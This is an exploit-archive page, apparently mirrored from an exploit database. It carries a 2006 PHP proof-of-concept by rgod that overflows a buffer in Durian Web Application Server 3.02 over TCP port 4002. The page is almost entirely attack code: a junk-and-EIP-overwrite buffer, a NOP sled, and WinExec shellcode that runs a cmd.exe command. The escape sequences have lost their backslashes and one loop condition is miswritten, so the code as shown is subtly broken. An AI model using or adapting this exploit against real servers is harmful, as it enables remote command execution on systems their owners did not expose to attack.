[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Durian Web Application Server 3.02 Remote Buffer Overflow Exploit
# Published : 2006-12-29
# Author : rgod
# Previous Title : Rediff Bol Downloader (ActiveX Control) Execute Local File Exploit
# Next Title : Http explorer Web Server 1.02 Directory Transversal Vulnerability 


<?php
/*
Durian Web Application Server 3.02 freeware for Win32 buffer
overflow execute command exploit

by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org

tested against xp sp2 ita

software site -> http://sourceforge.net/projects/durian/

*/

error_reporting(E_ALL);
$address = "192.168.1.3";
$service_port = "4002";

$shellcode =
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbx6dx13x86x7c". //WinExec, 0x7c86136d
"xffxd3".
"x31xc0".
"x50".
"xbbxdaxcdx81x7c". //ExitProcess, 0x7c81cdda
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"cmd.exe /c start notepad & ";

//$eip="x72xe0xf1x00";//DEP disabled
$eip="x72xe0xf2x00";

$ch  =array("xaa","xa0","x41");
$size=array(30,70,150,330,520,700,1400,2300);

    for ($j=0; $j<count($ch); $j++){
        for ($i=0; $i<count($size); $i++){
            $junk="";
            if (($j==2) and ($i==7)){
                $junk ="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVXXXX";
                $junk.="YYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuu";
		$junk.=$eip; //jmp shellcode
		for ($n=1; $n<=100; $n++){
		    $junk.="x90";
		}
		$junk.=$shellcode;
                for ($n=1; $n=(2300-strlen($junk)); $n++){
		    $junk.="x90";
		}
            }
            else {
		for ($k=1; $k<=$size[$i]; $k++){
                    $junk.=$ch[$j];
                }
	    }
            $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if ($socket < 0) {
                die("socket_create() failed:n reason: " . socket_strerror($socket) . "n");
            }
            $result = socket_connect($socket, $address, $service_port);
            if ($result < 0) {
                die("socket_connect() failed:n reason: ($result) " . socket_strerror($result) . "n");
            }
            $in = $junk;
            socket_write($socket, $in, strlen ($in));
            socket_close($socket);
        }
   }
?>

# www.Syue.com [2006-12-29]